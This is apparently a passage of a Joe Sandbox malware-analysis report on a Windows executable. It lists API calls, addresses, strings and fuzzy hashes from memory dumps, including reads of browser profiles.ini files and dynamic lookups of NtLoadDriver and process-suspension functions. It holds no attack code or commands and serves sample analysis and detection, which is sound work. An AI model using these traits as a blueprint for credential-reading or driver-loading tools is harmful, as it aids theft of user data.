                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 829165378-0
                                                                                                                                                                                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                                    • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                                                                                    • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                                    • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
